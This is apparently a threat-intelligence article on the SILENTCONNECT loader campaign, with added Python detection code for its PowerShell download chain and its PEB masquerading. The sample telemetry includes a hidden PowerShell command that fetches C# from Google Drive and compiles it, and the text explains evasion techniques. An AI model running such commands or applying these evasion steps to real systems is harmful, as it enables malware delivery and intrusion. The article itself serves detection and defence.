Elastic Security Labs has identified a new malicious campaign that uses a previously undocumented loader, tracked as SILENTCONNECT, to deliver the ScreenConnect Remote Monitoring and Management (RMM) tool. The operation has gone largely unnoticed since March 2025 because it stages its payload on trusted platforms and runs it through living-off-the-land binaries.

Infection Chain and Evasion

The SILENTCONNECT infection chain begins with a phishing email styled as a project proposal or digital invitation. Its link sends the victim to a fake Cloudflare Turnstile CAPTCHA page hosted on compromised infrastructure. When the user ticks the verification box, a lightly obfuscated VBScript file is downloaded to the target machine.

This script is the first-stage downloader. It hides its real logic behind a decoy children's story and string manipulation. When the VBScript runs, it launches a PowerShell process that uses the curl utility to fetch an obfuscated C# payload from Google Drive.

PowerShell's Add-Type cmdlet compiles the C# source at runtime, so the payload exists on disk only transiently. Once compiled, the .NET assembly is loaded directly into memory and executed reflectively, which avoids the execution artifacts a conventional dropped executable would leave on disk. The footprint is not zero, however: on Windows PowerShell 5.1, Add-Type still invokes csc.exe and writes the intermediate source and assembly under %TEMP% before deleting them, so a powershell.exe to csc.exe process chain and short-lived .cs and .dll files in the temp directory are worth alerting on. Once the main SILENTCONNECT loader is running, it uses several techniques to evade security software. The malware calls the native NtAllocateVirtualMemory API to reserve executable memory.
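The delivery chain described above (Windows Script Host launching PowerShell, PowerShell pulling C# source from Google Drive with curl and compiling it with Add-Type) can be expressed as detection logic. The block below is an added example written for this page, not Elastic's code or a published rule; it runs over constructed sample telemetry, and the event field names (pid, ppid, image, cmdline) and the proxy log format are assumptions loosely modelled on Sysmon process-creation events. It also checks proxy lines for the reused download_invitee.php path discussed in the infrastructure section.

```python
"""Added example (not Elastic's code): detection logic for the SILENTCONNECT delivery
chain, run over constructed sample telemetry. Field names are an assumption loosely
modelled on Sysmon process-creation events; adapt them to your own schema."""
import re

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    # Stage 1: the VBScript lure run by Windows Script Host.
    {"pid": 4100, "ppid": 3020, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\victim\Downloads\E-INVITE.vbs"'},
    # Stage 2: PowerShell fetches the C# source with curl and compiles it with Add-Type.
    {"pid": 4212, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ('powershell.exe -w hidden -ep bypass -c "curl.exe -s '
                 'https://drive.google.com/uc?export=download&id=EXAMPLE '
                 '-o $env:TEMP\\FileR.txt; Add-Type -TypeDefinition '
                 '(Get-Content $env:TEMP\\FileR.txt -Raw)"')},
    {"pid": 4300, "ppid": 4212, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -s https://drive.google.com/uc?export=download&id=EXAMPLE"},
    # Benign control: an administrator's interactive PowerShell session from Explorer.
    {"pid": 5000, "ppid": 1234,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Logs"},
]

# Constructed proxy log lines (not real traffic); the format is an assumption.
SAMPLE_PROXY = [
    "2025-03-14T09:12:03Z 10.0.0.21 GET https://compromised-site.example/download_invitee.php 200",
    "2025-03-14T09:12:05Z 10.0.0.21 GET https://drive.google.com/uc?export=download&id=EXAMPLE 200",
    "2025-03-14T09:15:44Z 10.0.0.33 GET https://intranet.example/index.php 200",
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
NATIVE_DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
DOWNLOAD_VERB = re.compile(r"\b(curl(\.exe)?|iwr|Invoke-WebRequest|wget|Start-BitsTransfer)\b", re.I)
FILE_SHARE_HOST = re.compile(r"drive\.google\.com|dropbox\.com|onedrive\.live\.com", re.I)
ADD_TYPE = re.compile(r"\bAdd-Type\b", re.I)
SILENTCONNECT_URI = re.compile(r"/download_invitee\.php\b", re.I)


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze_process_events(events):
    """Return {pid: [reasons]} for PowerShell processes matching the chain's behaviour."""
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    findings = {}
    for e in events:
        if image_name(e["image"]) not in POWERSHELL:
            continue
        reasons = []
        parent = by_pid.get(e["ppid"])
        if parent and image_name(parent["image"]) in SCRIPT_HOSTS:
            reasons.append("launched by Windows Script Host (VBScript stage)")
        cmd = e["cmdline"]
        if DOWNLOAD_VERB.search(cmd) and FILE_SHARE_HOST.search(cmd):
            reasons.append("downloads from a public file-sharing host")
        if ADD_TYPE.search(cmd):
            reasons.append("compiles C# at runtime with Add-Type")
        if any(image_name(c["image"]) in NATIVE_DOWNLOADERS for c in children.get(e["pid"], [])):
            reasons.append("spawns a native download utility")
        if reasons:
            findings[e["pid"]] = reasons
    return findings


def flag_proxy_lines(lines):
    """Return proxy lines whose URL carries the reused download_invitee.php path."""
    return [line for line in lines if SILENTCONNECT_URI.search(line)]


if __name__ == "__main__":
    for pid, reasons in analyze_process_events(SAMPLE_EVENTS).items():
        print("pid %d: %s" % (pid, "; ".join(reasons)))
    for line in flag_proxy_lines(SAMPLE_PROXY):
        print("proxy hit:", line)
```

Each reason on its own is noisy (administrators do use Add-Type and curl), so treat the count of reasons per PowerShell process as a score and alert when several co-occur, as they do for pid 4212 in the sample; the benign session from Explorer produces nothing.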

[Figure: SILENTCONNECT attack diagram (Source: Elastic)]

It then executes a small shellcode stub that locates the Process Environment Block (PEB) at runtime.

By going straight to the PEB, SILENTCONNECT bypasses the higher-level Windows APIs that are commonly monitored. The loader then rewrites its own module entries in the PEB loader data, replacing its name and path with those of the benign Windows program winhlp32.exe. This PEB masquerading is effective against endpoint detection and response (EDR) agents that treat the PEB as a reliable source of process and module information, since they will see winhlp32.exe where the loader is actually running. The kernel's own record of the process image (what QueryFullProcessImageName and kernel-mode callbacks report) is not changed by this trick, so a mismatch between the PEB-reported module path and the kernel-reported image path is a useful hunting signal.
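The PEB masquerade above can be spotted by asking the same question through two different paths. PSAPI's GetModuleFileNameExW answers by walking the target's PEB loader list, which is exactly what SILENTCONNECT rewrites, whereas QueryFullProcessImageNameW returns the image path the kernel recorded for the process. The block below is an added example written for this page, not Elastic's code or tooling; the Windows API calls only work on Windows, while the comparison helper classify() is pure Python. A PID to inspect is taken from the command line.

```python
"""Added example (not Elastic's code or tooling): a PEB-masquerade consistency check.

GetModuleFileNameExW reads the target's PEB loader list; QueryFullProcessImageNameW
returns the kernel's image path. If the two disagree for the main module, the PEB
has likely been tampered with. Windows-only for the live check; classify() runs
anywhere.
"""
import ctypes
import sys

PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010


def classify(peb_path, kernel_path):
    """Compare the PEB-reported main-module path with the kernel-reported image path.

    Returns None when they agree (case-insensitive, as NTFS paths are), otherwise a
    short description of the mismatch suitable for an alert.
    """
    a = peb_path.strip().lower()
    b = kernel_path.strip().lower()
    if a == b:
        return None
    a_name = a.rsplit("\\", 1)[-1]
    b_name = b.rsplit("\\", 1)[-1]
    if a_name != b_name:
        return ("PEB reports %s but the kernel image path is %s "
                "(module name spoofed)" % (peb_path, kernel_path))
    return ("PEB and kernel agree on the file name %s but not the directory: "
            "%s vs %s" % (b_name, peb_path, kernel_path))


def peb_vs_kernel_paths(pid):
    """Return (peb_path, kernel_path) for a live process. Windows only."""
    if sys.platform != "win32":
        raise OSError("PEB inspection requires Windows")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    psapi = ctypes.WinDLL("psapi", use_last_error=True)
    # Explicit argtypes so 64-bit handles and pointers are not truncated to int.
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    psapi.GetModuleFileNameExW.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                           ctypes.c_wchar_p, ctypes.c_uint32]
    k32.QueryFullProcessImageNameW.argtypes = [ctypes.c_void_p, ctypes.c_uint32,
                                               ctypes.c_wchar_p,
                                               ctypes.POINTER(ctypes.c_uint32)]
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        buf = ctypes.create_unicode_buffer(32768)
        # hModule=NULL selects the main module; PSAPI walks the remote PEB to answer.
        if not psapi.GetModuleFileNameExW(handle, None, buf, len(buf)):
            raise ctypes.WinError(ctypes.get_last_error())
        peb_path = buf.value
        size = ctypes.c_uint32(len(buf))
        # dwFlags=0 asks for the Win32 path form of the kernel-recorded image.
        if not k32.QueryFullProcessImageNameW(handle, 0, buf, ctypes.byref(size)):
            raise ctypes.WinError(ctypes.get_last_error())
        kernel_path = buf.value
    finally:
        k32.CloseHandle(handle)
    return peb_path, kernel_path


if __name__ == "__main__" and len(sys.argv) > 1:
    peb, kern = peb_vs_kernel_paths(int(sys.argv[1]))
    print(classify(peb, kern) or "consistent: %s" % kern)
```

Run it as an administrator against every process on a host and triage the mismatches. Legitimate processes can occasionally differ in path form (8.3 short names, volume GUID paths, junctions), so in production resolve both paths with GetLongPathNameW or compare file identity before alerting; a PEB entry naming winhlp32.exe for a process whose kernel image lives in a user-writable directory is the pattern this campaign produces.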

[Figure: Cloudflare CAPTCHA page (Source: Elastic)]

Operational Infrastructure and Identifiers

The operators behind SILENTCONNECT lean heavily on legitimate hosting services such as Cloudflare and Google Drive, which makes it hard for network defenders to block the malicious traffic outright. The attackers did, however, show poor operational security by reusing the URI path download_invitee.php across multiple compromised websites.

This consistent naming convention let researchers uncover additional infrastructure, including fake DocuSign and Microsoft Teams portals that delivered RMM agents directly.

[Figure: PowerShell download of cURL (Source: Elastic)]

Elastic notes that abuse of legitimate RMM software such as ScreenConnect is becoming more common because these tools are trusted in business environments and blend in with normal administrative traffic.

Security teams should watch for unexpected Defender exclusions, monitor unexpected memory-allocation calls from .NET processes, and audit their networks for unauthorized RMM use. The table below lists the main indicators and file artifacts linked to this campaign.

Artifact Type | Indicator / Detail | Description
File Name | E-INVITE.vbs | Initial VBScript payload downloaded via the fake Cloudflare CAPTCHA page
File Name | Suggestion: 03-2026.vbs | Alternate VBScript lure seen in recent phishing emails
File Name | FileR.txt | C# source fetched by PowerShell from Google Drive and compiled with Add-Type
URI Path | /download_invitee.php | Same path reused on compromised sites to deliver the payload